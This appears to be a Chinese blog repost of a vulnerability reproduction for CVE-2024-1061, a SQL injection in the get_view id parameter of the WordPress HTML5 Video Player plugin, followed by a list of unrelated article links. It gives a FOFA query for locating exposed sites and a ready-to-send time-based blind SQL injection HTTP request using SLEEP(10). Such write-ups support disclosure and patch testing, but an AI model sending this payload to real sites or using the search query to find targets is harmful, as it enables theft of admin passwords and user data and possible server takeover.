当前位置: 首页 > news >正文

WordPress Plugin HTML5 Video Player SQL注入漏洞复现(CVE-2024-1061)

0x01 产品简介

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。

0x02 漏洞概述

WordPress Plugin HTML5 Video Player 插件 get_view 函数中 id 参数存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 影响范围

HTML5 Video Player < 2.5.25

0x04 复现环境

FOFA:"wordpress" && body="html5-video-player"

0x05 漏洞复现

PoC

GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: clos
http://www.lryc.cn/news/296589.html

相关文章:

  • 【Kotlin】Kotlin基本数据类型
  • UDP端口探活的那些细节
  • 拦截器配置,FeignClient根据业务规则实现微服务动态路由
  • 预测模型:MATLAB线性回归
  • 【人工智能】神奇的Embedding:文本变向量,大语言模型智慧密码解析(10)
  • Redis + Lua 实现分布式限流器
  • ruoyi若依框架SpringSecurity实现分析
  • Habitat环境学习四:Habitat-sim基础用于导航——使用导航网格NavMesh
  • python学习笔记 -- 字符串
  • 2024年GPT如何发展?
  • 从REPR设计模式看 .NET的新生代类库FastEndpoints的威力
  • 前端入门:(五)JavaScript 续
  • 研究多态恶意软件,探讨网络安全与AI
  • linux驱动工作原理
  • Rust语言入门(第3篇)
  • 电脑服务器离线安装.net framework 3.5解决方案(错误:0x8024402c )(如何确定当前系统是否安装NET Framework 3.5)
  • Three.js学习8:基础贴图
  • 【Linux】进程学习(二):进程状态
  • Spring Boot 笔记 003 Bean注册
  • PCIE 参考时钟架构
  • 【开源】JAVA+Vue.js实现在线课程教学系统
  • 计算机网络(第六版)复习提纲29
  • 有道ai写作,突破免费限制,无限制使用
  • node.js 使用 elementtree 生成思维导图 Freemind 文件
  • Vue中路由守卫的详细应用
  • Flink Checkpoint过程
  • 【Java程序代理与系统代理关系】Java程序代理与系统代理关系优先级及覆盖关系
  • MQ,RabbitMQ,SpringAMQP的原理与实操
  • Vue 3 + Koa2 + MySQL 开发和上线部署个人网站
  • uniapp踩坑之项目:简易版不同角色显示不一样的tabbar和页面